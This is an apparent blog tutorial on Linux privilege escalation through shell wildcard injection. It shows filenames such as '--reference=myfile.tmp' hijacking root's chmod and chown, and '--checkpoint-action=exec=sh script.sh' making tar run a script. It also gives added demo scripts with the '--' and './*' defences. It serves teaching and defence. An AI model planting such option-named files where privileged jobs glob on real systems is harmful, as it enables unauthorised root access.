Monday, January 11, 2021

Privilege Escalation in Linux via Wildcards

What is a wildcard

A wildcard is a character that stands in for a class of characters in a pattern. In the shell, wildcards (globs) are expanded into the list of matching filenames before the command runs, which is what makes them convenient and, as we will see, dangerous.

Wildcards

* - Matches any number of characters, including none. (backup* = backup1, backup2, backup3)
? - Matches exactly one character. (file? = fileA, fileB, fileC)
[] - Matches a single character from the enclosed set. ([abc] = a, b or c)
- - Inside brackets, the hyphen denotes a range of characters or digits. ([a-z] = a, b, c ... z)
~ - The tilde is not a pattern but expands to the user's home directory (~ = /home/sam)

The wildcard we will be working with today is the '*' or star wildcard. Some examples of the star wildcard in action:

# list all tmp files
ls *.tmp

# Remove all files beginning with backup
rm -r backup*

When we invoke the star wildcard, the shell expands it into the matching filenames on the command line before the program starts; the program never sees the '*' itself.

sam@debian:~$ ls -l *.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 a.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 b.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 c.tmp
sam@debian:~$

Would be the same as typing this:

sam@debian:~$ ls -l a.tmp b.tmp c.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 a.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 b.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 c.tmp
sam@debian:~$

If we 'ls' the '~/backup' directory we see three files inside. Next we use 'cat' with the star wildcard to print the contents of every file in the directory.

sam@debian:~/backup$ ls -l
total 12
-rw-r--r-- 1 sam sam 15 Jan 11 16:59 a.tmp
-rw-r--r-- 1 sam sam 21 Jan 11 16:59 b.tmp
-rw-r--r-- 1 sam sam 25 Jan 11 16:59 c.tmp
sam@debian:~/backup$ 
sam@debian:~/backup$ cat *
this is a test
this is another test
this is yet another test
sam@debian:~/backup$ 

The 'cat' command executed successfully and printed the contents of the three files. The filenames were expanded, so the command that actually ran was:

sam@debian:~/backup$ cat a.tmp b.tmp c.tmp

With that in mind, what happens if we create a file or directory whose name is an option to 'cat', such as '--help', and then use the wildcard?

sam@debian:~/backup$ echo "" > "--help"
sam@debian:~/backup$ 
sam@debian:~/backup$ ls -l
total 16
-rw-r--r-- 1 sam sam 15 Jan 11 16:59 a.tmp
-rw-r--r-- 1 sam sam 21 Jan 11 16:59 b.tmp
-rw-r--r-- 1 sam sam 25 Jan 11 16:59 c.tmp
-rw-r--r-- 1 sam sam  1 Jan 11 19:15 --help
sam@debian:~/backup$

As you can see we created a file called '--help' in the directory. Next we will invoke the 'cat' command with the star wildcard character and see what happens.

sam@debian:~/backup$ cat *
Usage: cat [OPTION]... [FILE]...
Concatenate FILE(s) to standard output.

With no FILE, or when FILE is -, read standard input.

  -A, --show-all           equivalent to -vET
  -b, --number-nonblank    number nonempty output lines, overrides -n
  -e                       equivalent to -vE
  -E, --show-ends          display $ at end of each line
  -n, --number             number all output lines
  -s, --squeeze-blank      suppress repeated empty output lines
  -t                       equivalent to -vT
  -T, --show-tabs          display TAB characters as ^I
  -u                       (ignored)
  -v, --show-nonprinting   use ^ and M- notation, except for LFD and TAB
      --help     display this help and exit
      --version  output version information and exit

Examples:
  cat f - g  Output f's contents, then standard input, then g's contents.
  cat        Copy standard input to standard output.

GNU coreutils online help: 
Full documentation at: 
or available locally via: info '(coreutils) cat invocation'
sam@debian:~/backup$

We got back the help dialog of the 'cat' command. The full command looks like this after the star wildcard is expanded:

sam@debian:~/backup$ cat a.tmp b.tmp c.tmp --help

When the star wildcard expanded the filenames onto the command line it also expanded our '--help' filename, and because GNU getopt accepts options anywhere on the line (it permutes the arguments), 'cat' read that word as an option and printed its help text instead of the files.

Any program with this parsing behaviour can be made to run options it was never given. When the program runs as a more privileged user (a root cron job, a sudo rule, a SUID helper), this can lead to privilege escalation. The two standard defences are to end the option list explicitly ('cat -- *') or to anchor the glob so that no expansion can begin with '-' ('cat ./*').
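The injection above, reproduced in a throwaway directory together with the two hardened spellings. This is an added example, not code from the original post; it assumes a Linux shell with GNU coreutils 'cat', and the file name 'wildcard_demo.sh' used in the usage note is only an assumption.

```sh
#!/bin/sh
# Added example, not code from the original post: reproduce the '--help'
# injection from the section above and show the two hardened spellings.
# Assumes a Linux shell with GNU coreutils 'cat'; all files live in a
# fresh temporary directory, so nothing on the host is touched.

set -u

# Constructed fixture: the three files from the post plus a file whose
# name is an option. The redirection target is never parsed as an option,
# which is exactly why an attacker can create such a name so easily.
make_backup_dir() {
    local dir
    dir=$(mktemp -d)
    printf 'this is a test\n'           > "$dir/a.tmp"
    printf 'this is another test\n'     > "$dir/b.tmp"
    printf 'this is yet another test\n' > "$dir/c.tmp"
    : > "$dir/--help"
    printf '%s\n' "$dir"
}

# Vulnerable form: '*' expands to bare words and GNU getopt accepts an
# option anywhere on the line, so '--help' wins and no file is printed.
cat_unsafe() {
    ( cd "$1" && cat * 2>/dev/null )
}

# Hardened form 1: '--' ends option parsing; every later word is an operand.
cat_safe_dashdash() {
    ( cd "$1" && cat -- * )
}

# Hardened form 2: './*' cannot expand to a word that starts with '-'.
cat_safe_dotslash() {
    ( cd "$1" && cat ./* )
}

# Pre-flight check for a privileged script: how many names in the
# directory would be parsed as options if a bare '*' were used?
count_option_like_names() {
    ( cd "$1" && n=0
      for f in *; do
          case $f in -*) n=$((n + 1)) ;; esac
      done
      echo "$n" )
}

# Stand-alone demo (sh wildcard_demo.sh demo): help text first, then
# the real file contents from both hardened forms.
if [ "${1:-}" = "demo" ]; then
    d=$(make_backup_dir)
    echo "== cat *";    cat_unsafe "$d" | head -n 3
    echo "== cat -- *"; cat_safe_dashdash "$d"
    echo "== cat ./*";  cat_safe_dotslash "$d"
    echo "option-shaped names found: $(count_option_like_names "$d")"
    rm -rf "$d"
fi
```

Run it as 'sh wildcard_demo.sh demo'. The 'count_option_like_names' check is the sort of guard worth adding to any root-owned script that globs over a directory other users can write to: a non-zero result means the glob is not safe to pass unanchored.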

File Hijacking using CHOWN and CHMOD

chmod

The '--reference=RFILE' option tells 'chown' to copy RFILE's owner and group, and tells 'chmod' to copy RFILE's permission bits, onto the given files instead of taking them from the command line. Combined with the star wildcard, a filename of the form '--reference=...' lets us take ownership of, or change the permissions on, every file a privileged user touches with a wildcard in our directory.

For this we are going to create two files which we will use to hijack the remaining files in the directory using the wildcard principle above.

dax@debian:/home/sam/backup$ echo "" > myfile.tmp
dax@debian:/home/sam/backup$ chmod 777 myfile.tmp
dax@debian:/home/sam/backup$ echo "" > "--reference=myfile.tmp"

If we list the directory we will see our file 'myfile.tmp' is '-rwxrwxrwx'. We want to set all the files in the directory to '-rwxrwxrwx'.

dax@debian:/home/sam/backup$ ls -l
total 20
-rw-r--r-- 1 sam sam 15 Jan 11 16:59  a.tmp
-rw-r--r-- 1 sam sam 21 Jan 11 16:59  b.tmp
-rw-r--r-- 1 sam sam 25 Jan 11 16:59  c.tmp
-rwxrwxrwx 1 dax dax  1 Jan 11 21:17  myfile.tmp
-rw-r--r-- 1 dax dax  1 Jan 11 21:18 '--reference=myfile.tmp'
dax@debian:/home/sam/backup$ 

If 'root' comes along and tries to chmod the files using the star wildcard, this happens:

root@debian:/home/sam/backup# chmod 000 *
chmod: cannot access '000': No such file or directory
root@debian:/home/sam/backup# ls -l
total 20
-rwxrwxrwx 1 sam sam 15 Jan 11 16:59  a.tmp
-rwxrwxrwx 1 sam sam 21 Jan 11 16:59  b.tmp
-rwxrwxrwx 1 sam sam 25 Jan 11 16:59  c.tmp
-rwxrwxrwx 1 dax dax  1 Jan 11 21:17  myfile.tmp
-rw-r--r-- 1 dax dax  1 Jan 11 21:18 '--reference=myfile.tmp'
root@debian:/home/sam/backup#

Now all the '.tmp' files have '-rwxrwxrwx' permissions. Note what happened to the arguments: '--reference=myfile.tmp' was consumed as an option (so the file of that name is untouched and keeps its '-rw-r--r--'), and the intended mode '000' was demoted to a file operand, which is why chmod complained that it cannot access '000'. The command failed noisily and still did the attacker's work.

chown

Chown works on the same principle as 'chmod'. We start off by creating two files in the directory.

dax@debian:/home/sam/backup$ echo "" > myfile.tmp
dax@debian:/home/sam/backup$ echo "" > "--reference=myfile.tmp"
dax@debian:/home/sam/backup$ 
dax@debian:/home/sam/backup$ ls -l
total 20
-rw-r--r-- 1 sam sam 15 Jan 11 16:59  a.tmp
-rw-r--r-- 1 sam sam 21 Jan 11 16:59  b.tmp
-rw-r--r-- 1 sam sam 25 Jan 11 16:59  c.tmp
-rw-r--r-- 1 dax dax  1 Jan 11 20:45  myfile.tmp
-rw-r--r-- 1 dax dax  1 Jan 11 20:45 '--reference=myfile.tmp'
dax@debian:/home/sam/backup$ 

As you can see we have two files created where the user 'dax' owns the files while the rest of the files are owned by 'sam'. Next we run 'chown' as 'root' and try to change the owner of the files with the star wildcard character.

root@debian:/home/sam/backup# chown -R nobody:nobody *.tmp
chown: cannot access 'nobody:nobody': No such file or directory
root@debian:/home/sam/backup#

If we look at the directory listing now, we see that all files are owned by the user 'dax': 'nobody:nobody' was treated as a (missing) file operand, and the owner and group were taken from the attacker's reference file instead. (The listing below comes from a separate run in which the reference file was named 'reference.tmp' rather than 'myfile.tmp'; the outcome is the same.)

root@debian:/home/sam/backup# ls -l
total 16
-rw-r--r-- 1 dax dax 15 Jan 11 16:59  a.tmp
-rw-r--r-- 1 dax dax 21 Jan 11 16:59  b.tmp
-rw-r--r-- 1 dax dax 25 Jan 11 16:59  c.tmp
-rw-r--r-- 1 dax dax  1 Jan 11 20:09 '--reference=reference.tmp'
-rw-r--r-- 1 dax dax  0 Jan 11 20:07  reference.tmp
root@debian:/home/sam/backup# 

Script Execution using Tar Checkpoints

The 'tar' program can run 'checkpoint' actions at intervals while it reads or writes an archive. Two options control this: '--checkpoint[=N]' makes tar reach a checkpoint every N records (every 10 if N is omitted), and '--checkpoint-action=ACTION' says what to do there. One of the available actions is 'exec=COMMAND', which runs COMMAND through '/bin/sh -c' with tar's working directory and privileges.

We need to create three files to carry this out. The first is the script to be executed; the other two carry the names of the options we want tar to pick up at the specified time.

sam@debian:~/backup$ echo "echo owned>owned" > script.sh
sam@debian:~/backup$ echo "" > "--checkpoint=1"
sam@debian:~/backup$ echo "" > "--checkpoint-action=exec=sh script.sh"
sam@debian:~/backup$ ls -l
total 40
-rw-r--r-- 1 sam sam    15 Jan 11 16:59  a.tmp
-rw-r--r-- 1 sam sam    21 Jan 11 16:59  b.tmp
-rw-r--r-- 1 sam sam     1 Jan 11 17:30 '--checkpoint=1'
-rw-r--r-- 1 sam sam     1 Jan 11 17:31 '--checkpoint-action=exec=sh script.sh'
-rw-r--r-- 1 sam sam    25 Jan 11 16:59  c.tmp
-rw-r--r-- 1 sam sam    17 Jan 11 17:35  script.sh
sam@debian:~/backup$

When we run 'tar cf archive.tar *' the shell expands the star into every name in the directory, sorted according to the current locale (the same order 'ls' showed above), so tar receives:

tar cf archive.tar a.tmp b.tmp --checkpoint=1 '--checkpoint-action=exec=sh script.sh' c.tmp script.sh

Two details make this work. Glob results are not word-split, so the filename containing a space arrives as a single argument, and tar's option parser accepts options wherever they appear, so it does not matter that they land in the middle of the operand list.

If we run the tar program and ls the directory we see the script executed successfully.

sam@debian:~/backup$ tar cf archive.tar *
sam@debian:~/backup$ ls -l
total 40
-rw-r--r-- 1 sam sam 10240 Jan 11 17:35  archive.tar
-rw-r--r-- 1 sam sam    15 Jan 11 16:59  a.tmp
-rw-r--r-- 1 sam sam    21 Jan 11 16:59  b.tmp
-rw-r--r-- 1 sam sam     1 Jan 11 17:30 '--checkpoint=1'
-rw-r--r-- 1 sam sam     1 Jan 11 17:31 '--checkpoint-action=exec=sh script.sh'
-rw-r--r-- 1 sam sam    25 Jan 11 16:59  c.tmp
-rw-r--r-- 1 sam sam     6 Jan 11 17:35  owned
-rw-r--r-- 1 sam sam    17 Jan 11 17:35  script.sh
sam@debian:~/backup$ 

As you can see, 'script.sh' ran and created the 'owned' file. It ran with the privileges of whoever invoked tar, so if this directory is swept by a root cron job or a sudo-permitted backup command, the script runs as root.
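The checkpoint trick reproduced in a temporary directory, with the hardened backup command beside it and a member count that shows what tar silently dropped. This is an added example, not code from the original post; it assumes GNU tar (checkpoint actions are a GNU extension) and uses a constructed stand-in payload that only drops a marker file. The file name 'tar_demo.sh' in the usage note is an assumption.

```sh
#!/bin/sh
# Added example, not code from the original post: the tar checkpoint
# trick reproduced in a temporary directory next to the hardened backup
# command. Assumes GNU tar (--checkpoint-action is a GNU extension); the
# "payload" is a constructed stand-in that only drops a marker file.

set -u

have_gnu_tar() {
    tar --version 2>/dev/null | grep -q 'GNU tar'
}

# Constructed fixture: two data files, the payload script and the two
# option-shaped filenames from the post. Note the space in the second
# name: glob results are not word-split, so tar still receives it as a
# single argument.
make_tar_dir() {
    local dir
    dir=$(mktemp -d)
    printf 'this is a test\n'       > "$dir/a.tmp"
    printf 'this is another test\n' > "$dir/b.tmp"
    printf 'id -un > owned\n'       > "$dir/script.sh"   # records who ran it
    : > "$dir/--checkpoint=1"
    : > "$dir/--checkpoint-action=exec=sh script.sh"
    printf '%s\n' "$dir"
}

# The victim's backup job as written in the post: a bare '*'.
backup_unsafe() {
    ( cd "$1" && rm -f archive.tar owned && tar cf archive.tar * )
}

# Hardened: './*' keeps every expanded word from starting with '-', so
# the two option-shaped names are archived as ordinary files.
backup_safe() {
    ( cd "$1" && rm -f archive.tar owned && tar cf archive.tar ./* )
}

# "yes" if the payload ran (marker present), otherwise "no".
payload_ran() {
    if [ -f "$1/owned" ]; then echo yes; else echo no; fi
}

# Number of members in the archive. The safe run stores 5 names; the
# unsafe run stores only 3, because two "files" were eaten as options.
member_count() {
    ( cd "$1" && tar tf archive.tar | wc -l | tr -d ' ' )
}

# Stand-alone demo (sh tar_demo.sh demo).
if [ "${1:-}" = "demo" ]; then
    d=$(make_tar_dir)
    backup_unsafe "$d"
    echo "tar cf archive.tar *   : payload ran=$(payload_ran "$d") members=$(member_count "$d")"
    backup_safe "$d"
    echo "tar cf archive.tar ./* : payload ran=$(payload_ran "$d") members=$(member_count "$d")"
    rm -rf "$d"
fi
```

The member count is a useful audit signal on its own: a backup that archives fewer entries than the directory holds, with no error, is exactly what an option injected through a filename looks like from the outside.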
